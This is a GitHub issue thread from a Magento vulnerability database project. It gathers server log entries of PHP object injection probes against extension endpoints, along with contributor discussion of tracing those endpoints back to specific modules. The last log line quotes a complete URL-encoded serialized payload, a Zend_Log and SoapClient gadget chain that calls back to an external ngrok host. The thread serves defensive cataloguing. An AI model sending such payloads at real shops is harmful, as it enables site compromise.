sansecio / magevulndb

List of Magento extensions with known security issues.
https://sansec.io

More POI probes #20

Open gwillem opened 5 years ago

gwillem commented 5 years ago

185.198.56.4 - [05/Jan/2019:16:44:21 +0000] "GET /customerconnect/rfqs/configureproduct/?options=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 HTTP/1.1" 403 2988 "" ""
185.198.56.4 - [06/Jan/2019:17:16:07 +0000] "GET /vendors/credit/withdraw/review/?data=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 HTTP/1.1" 403 2988 "" ""
109.237.138.20 - [06/Jan/2019:18:23:37 +0000] "GET /comm/returns/configureproduct/?options=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 HTTP/1.1" 403 2988 "" ""

mpchadwick commented 5 years ago

In cases where the endpoint cannot be correlated back to a specific module, what if we extracted the frontName from the relevant URI column and checked for modules that registered the same <frontName>? It's going to be more noisy than using full module identifier + version, but people can manually review the code if it's flagged (and maybe it can help with correlating the endpoints back to specific modules).

rhoerr commented 5 years ago

I brought that up in https://github.com/gwillem/magevulndb/pull/11#issuecomment-457864143. I like the idea but we'll have to normalize the route data for it to work. That might be a feature for the MageRun plugin only; it would drastically increase the size of the single-line command.

gwillem commented 5 years ago

2018-08-21T02:42:41+00:00 301    178 UA 193.106.30.131  "GET GET /ajax/Showroom/submit/?schedule[time]=O%3A8%3A%22Zend_Log%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00_writers%22%3Ba%3A1%3A%7Bi%3A1%3BO%3A10%3A%22SoapClient%22%3A3%3A%7Bs%3A3%3A%22uri%22%3Bs%3A47%3A%22http%3A%2F%2F369c19f5.ngrok.io%2F%3Fsite1%3Dvictimdomain.com%22%3Bs%3A8%3A%22location%22%3Bs%3A47%3A%22http%3A%2F%2F369c19f5.ngrok.io%2F%3Fsite1%3Dvictimdomain.com%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D%7D%7D HTTP/1.1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"